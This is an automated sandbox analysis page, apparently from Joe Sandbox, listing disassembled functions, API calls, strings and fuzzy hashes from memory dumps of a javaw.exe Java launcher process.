Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 6dc59466d0fb12c2c5a928e537d30682ea7347da89a96b13da8c128262237c66
Instruction ID: a35379ce0aebbea1071d003bf81d1d37220530af894bad01d40bf5a679bb9631
Opcode Fuzzy Hash: 6dc59466d0fb12c2c5a928e537d30682ea7347da89a96b13da8c128262237c66
Instruction Fuzzy Hash: C1B0923200424CBB8F021EC1DC008993F2AEB48264B008420FA2C094219773A971AB88

Function 6D5EACE0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

listen.WSOCK32(?,?,?,6D52AD4C,?,?), ref: 6D5EACE9

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: listen
String ID:
API String ID: 3257165821-0
Opcode ID: b014e9adc4349f68d40c4025e467d512779112a39ddbe84d3d8b1f68475dbffd
Instruction ID: b7182bcb52f0de0aabc5c560caa963e10760c4dcfede3a098a792a5b127fc876
Opcode Fuzzy Hash: b014e9adc4349f68d40c4025e467d512779112a39ddbe84d3d8b1f68475dbffd
Instruction Fuzzy Hash: C7B0123100410C778F011E91DC008483F2EDB08164B00C050FA1C084208B73AB6156C4

Function 6FA74250 Relevance: 1.3, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6FA74278

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: de9822fde80d75d27db2c42cd9c4d6b48a78a24aa03c044972750b8e5757fdfa
Instruction ID: 81721ca447c53c4898303a374753f20d851c56f87627516d39cbbe5a130aee52
Opcode Fuzzy Hash: de9822fde80d75d27db2c42cd9c4d6b48a78a24aa03c044972750b8e5757fdfa
Instruction Fuzzy Hash: 0E11D6B9508714EFC710AF59C58496EBBE8FF89750F11C82EE8988B350CB34D885CB52

Function 6FA74156 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6FA74171

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 50cda4ef4300aa45242bb1e48e76e84e2bc67933f3abeb1885de6045d1240e99
Instruction ID: 9bd1278105f8d794da4a3b7379c4193a61976680c469c7b7a5e243b523c885c9
Opcode Fuzzy Hash: 50cda4ef4300aa45242bb1e48e76e84e2bc67933f3abeb1885de6045d1240e99
Instruction Fuzzy Hash: FD11FEB8508704AFC714EF28C984E6EBBE8FF45654F01C95EE89887305DB74D985CB91

Function 6D52BD40 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c551120df15a6a5e4d381781bf4ef220178e693739d0b9239f258c1dd8f987b
Instruction ID: 18a57037b6c72f53a995f3cffdb9d01e77a17db26f7d88352c657b0403b99bcf
Opcode Fuzzy Hash: 1c551120df15a6a5e4d381781bf4ef220178e693739d0b9239f258c1dd8f987b
Instruction Fuzzy Hash: 6CF0157240410DAFCF06DF98C800EEEBBA9EB09200F00405AFA5053210D732AA64EBD1

Function 6FA72EF8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed27058e76f116788fb5c4603e29a3536f4ee962ca876350a9cbad3170b106c8
Instruction ID: 912ed62f5ae401b22e4e0519bb609ce71357695329481c37760cb3df1c2d05ea
Opcode Fuzzy Hash: ed27058e76f116788fb5c4603e29a3536f4ee962ca876350a9cbad3170b106c8
Instruction Fuzzy Hash: 05D09E7860434897CB10FF79CE41D8F36E55F41308F854525A9419B385DB78ECA59BB1

Function 6FA72ECD Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d7c60d9720da848d7410b4c2424d25317c2b7c41f66b69a6af3f5df4ccbd6b
Instruction ID: af4a10f6a97053cd57bb895d6db27493cff29890ef9a8e24c8323c6d199a9779
Opcode Fuzzy Hash: a5d7c60d9720da848d7410b4c2424d25317c2b7c41f66b69a6af3f5df4ccbd6b
Instruction Fuzzy Hash: B9D05E3860424887DB10FE38CA40D8E36E45B80304F004414A8408B281DA38EC91CBA6

Function 6D51F540 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9868cfa6780d7c794bc957907a45b296b0403528f1c8820e6eadce1f5f9b0514
Instruction ID: 9d535b9c4ed2dbcf8a1c204f4876d6280ccbea01828d60af34c062fe52ed1cd3
Opcode Fuzzy Hash: 9868cfa6780d7c794bc957907a45b296b0403528f1c8820e6eadce1f5f9b0514
Instruction Fuzzy Hash: 58D0127340824C6ADF066F90AC00F6D7F556B54284F054015FA1804872D77295B0E791

Function 6D52AD30 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7df3e3f91dbf32911af4f019d118499628daeeed3f09dddb1c41187b9c0fedc
Instruction ID: 4ee6a9de567f6220c7f8896e9c99c56a3a178a8388e5feac38e90a46b3305488
Opcode Fuzzy Hash: d7df3e3f91dbf32911af4f019d118499628daeeed3f09dddb1c41187b9c0fedc
Instruction Fuzzy Hash: A8C0803244510C2ACB0667709C01F6C7B592750245F458011FA0C08C62D77155B8E3D1

Function 00E02735 Relevance: 89.7, APIs: 2, Strings: 49, Instructions: 449COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E029CB

Part of subcall function 00E011AE: _strlen.LIBCMT ref: 00E011B2

_strlen.LIBCMT ref: 00E02B4E

Strings

-Xdebug, xrefs: 00E0292E
-verbosegc, xrefs: 00E028D1
-X%s, xrefs: 00E02B62
-showversion, xrefs: 00E0280D
-mx, xrefs: 00E02A54
-splash:, xrefs: 00E02AE7
-Xfuture, xrefs: 00E02954
%s full version "%s", xrefs: 00E02BB9
-XshowSettings, xrefs: 00E0286F
-Xverify:all, xrefs: 00E02966
-cp, xrefs: 00E02781
-debug, xrefs: 00E0291C
-Xt, xrefs: 00E028FC
-verbose:gc, xrefs: 00E028E3
Error: %s requires class path specification, xrefs: 00E02BE9
-Dsun.java.launcher.diag=true, xrefs: 00E028AB
-Xnoclassgc, xrefs: 00E0294A
-prof, xrefs: 00E029B9
-classpath, xrefs: 00E02768
-jar, xrefs: 00E02796
-XshowSettings:, xrefs: 00E02884
-ms, xrefs: 00E02A3F
-cs, xrefs: 00E02A7E
-version, xrefs: 00E027F8
-Xverify:none, xrefs: 00E029AF
-fullversion, xrefs: 00E028BC
Error: %s requires jar file specification, xrefs: 00E02BA6
-Xverify:remote, xrefs: 00E02993
-noclassgc, xrefs: 00E02938
-d32, xrefs: 00E02B0B
-jre-restrict-search, xrefs: 00E02AD2
-Xrunhprof:cpu=old,file=java.prof, xrefs: 00E029F7
-help, xrefs: 00E027B9
-version:, xrefs: 00E02AA8
-oss, xrefs: 00E02A2A
-Xtm, xrefs: 00E02915
-no-jre-restrict-search, xrefs: 00E02ABD
-d64, xrefs: 00E02B20
-checksource, xrefs: 00E02A69
-Xdiag, xrefs: 00E02899
CLASSPATH, xrefs: 00E02735
-Xrunhprof:cpu=old,file=%s, xrefs: 00E029E7
-verifyremote, xrefs: 00E02981
-ss, xrefs: 00E02A15
Warning: %s option is no longer supported., xrefs: 00E02B3E
-noasyncgc, xrefs: 00E02A93
-noverify, xrefs: 00E0299D
-verify, xrefs: 00E02970
-tm, xrefs: 00E02903

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen
String ID: %s full version "%s"$-Dsun.java.launcher.diag=true$-X%s$-Xdebug$-Xdiag$-Xfuture$-Xnoclassgc$-Xrunhprof:cpu=old,file=%s$-Xrunhprof:cpu=old,file=java.prof$-XshowSettings$-XshowSettings:$-Xt$-Xtm$-Xverify:all$-Xverify:none$-Xverify:remote$-checksource$-classpath$-cp$-cs$-d32$-d64$-debug$-fullversion$-help$-jar$-jre-restrict-search$-ms$-mx$-no-jre-restrict-search$-noasyncgc$-noclassgc$-noverify$-oss$-prof$-showversion$-splash:$-ss$-tm$-verbose:gc$-verbosegc$-verify$-verifyremote$-version$-version:$CLASSPATH$Error: %s requires class path specification$Error: %s requires jar file specification$Warning: %s option is no longer supported.
API String ID: 4218353326-4115674733
Opcode ID: 95303767ac70859f45f682cd8a33165112ed692a5f2fdb13dc42c954177f62e0
Instruction ID: 7c3e79521dace840fa9821b6f0202622c72267bb6aa3228d18f0927404b25f3d
Opcode Fuzzy Hash: 95303767ac70859f45f682cd8a33165112ed692a5f2fdb13dc42c954177f62e0
Instruction Fuzzy Hash: 25B128362883136AE61D6625BC5BEBB27D88F96B34F24746EF600B50C3FF55A4C09139

Function 00E052AA Relevance: 44.1, APIs: 12, Strings: 13, Instructions: 327processsynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000,?), ref: 00E052DC
_strlen.LIBCMT ref: 00E05310
GetCommandLineA.KERNEL32(?,?,?,?,?), ref: 00E05345
_strlen.LIBCMT ref: 00E05366
_strlen.LIBCMT ref: 00E05372
_strcat.LIBCMT ref: 00E053B2
_strcat.LIBCMT ref: 00E053C6
CreateProcessA.KERNEL32 ref: 00E0559F
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E055B0
GetExitCodeProcess.KERNEL32 ref: 00E055C4
CloseHandle.KERNEL32(?), ref: 00E055E9
CloseHandle.KERNEL32(?), ref: 00E055EF

Strings

-no-jre-restrict-search, xrefs: 00E05457
Error: CreateProcess(%s, ...) failed:, xrefs: 00E05625
ExecJRE: new: %s, xrefs: 00E05305
ReExec Command: %s (%s), xrefs: 00E05524
ReExec Args: %s, xrefs: 00E05532
-classpath, xrefs: 00E05410
ExecJRE: old: %s, xrefs: 00E052FA
-jre-restrict-search, xrefs: 00E05446
Error: WaitForSingleObject() failed., xrefs: 00E055D0
Error: Unable to resolve %s, xrefs: 00E055F8
-cp, xrefs: 00E05421
%s\bin\%s.exe, xrefs: 00E05332
-version:, xrefs: 00E05434

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$CloseHandleProcess_strcat$CodeCommandCreateExitFileLineModuleNameObjectSingleWait
String ID: %s\bin\%s.exe$-classpath$-cp$-jre-restrict-search$-no-jre-restrict-search$-version:$Error: CreateProcess(%s, ...) failed:$Error: Unable to resolve %s$Error: WaitForSingleObject() failed.$ExecJRE: new: %s$ExecJRE: old: %s$ReExec Args: %s$ReExec Command: %s (%s)
API String ID: 1214927763-2302492997
Opcode ID: 02dc4d48b6a9da5928fa251517578fa6be6067df0b42f8fcb5eb3a76190b0b31
Instruction ID: 8e1e6395e21fabeadcec062b29c41db01c9dc1d878aca7fa7333c441b469693d
Opcode Fuzzy Hash: 02dc4d48b6a9da5928fa251517578fa6be6067df0b42f8fcb5eb3a76190b0b31
Instruction Fuzzy Hash: AF91E0B35087146EE618AAB0AC46EEF37DCDF44360F14282AF541F60C2FE65D9C58A66

Function 6FA8588A Relevance: 36.4, APIs: 16, Strings: 8, Instructions: 376COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6FA858B2
memcmp.MSVCRT ref: 6FA858EB
memcmp.MSVCRT ref: 6FA85AAF

Strings

ful, xrefs: 6FA85B90
ize, xrefs: 6FA85F22
ate, xrefs: 6FA85E9B
ive, xrefs: 6FA85F00
iti, xrefs: 6FA85EC2
ance, xrefs: 6FA85C73
ence, xrefs: 6FA85C9A
ous, xrefs: 6FA85EDE

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$ful$iti$ive$ize$ous
API String ID: 1475443563-285752282
Opcode ID: 4bb2509898fe0c70f67fd4b5bc2220001221561b033139de1147758c0fb2a820
Instruction ID: 935ebfd41f565209ea5c6e283323e05a879c1caf92b76bdcab8a4078331d46c4
Opcode Fuzzy Hash: 4bb2509898fe0c70f67fd4b5bc2220001221561b033139de1147758c0fb2a820
Instruction Fuzzy Hash: F1F14AB0D193468FDB00CF18C5846AEBBF4AF45354F15844ADCA99B344E7B9E886CF52

Function 6FA8579C Relevance: 34.9, APIs: 15, Strings: 8, Instructions: 368COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6FA857C0
memcmp.MSVCRT ref: 6FA85811
memcmp.MSVCRT ref: 6FA8585C
memcmp.MSVCRT ref: 6FA85AAF

Strings

ful, xrefs: 6FA85B90
ize, xrefs: 6FA85F22
ate, xrefs: 6FA85E9B
ive, xrefs: 6FA85F00
iti, xrefs: 6FA85EC2
ance, xrefs: 6FA85C73
ence, xrefs: 6FA85C9A
ous, xrefs: 6FA85EDE

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$ful$iti$ive$ize$ous
API String ID: 1475443563-285752282
Opcode ID: ac69106de7664de2bcfcb92a48a877fd1a9b532b55c0dde07e0cc48eb2a0106e
Instruction ID: 34d15526b40f96d3aed2e4700ef9283b1729fece50b09313a7cc69f1f972ee4f
Opcode Fuzzy Hash: ac69106de7664de2bcfcb92a48a877fd1a9b532b55c0dde07e0cc48eb2a0106e
Instruction Fuzzy Hash: 66F16AB0D193468FDB00CF18C5846AEBBF4AF45358F15844ADCA59B344E7B9E886CF52

Function 6FA85995 Relevance: 34.9, APIs: 15, Strings: 8, Instructions: 361COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6FA859BD
memcmp.MSVCRT ref: 6FA859F9
memcmp.MSVCRT ref: 6FA85AAF

Strings

ful, xrefs: 6FA85B90
ize, xrefs: 6FA85F22
ate, xrefs: 6FA85E9B
ive, xrefs: 6FA85F00
iti, xrefs: 6FA85EC2
ance, xrefs: 6FA85C73
ence, xrefs: 6FA85C9A
ous, xrefs: 6FA85EDE

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
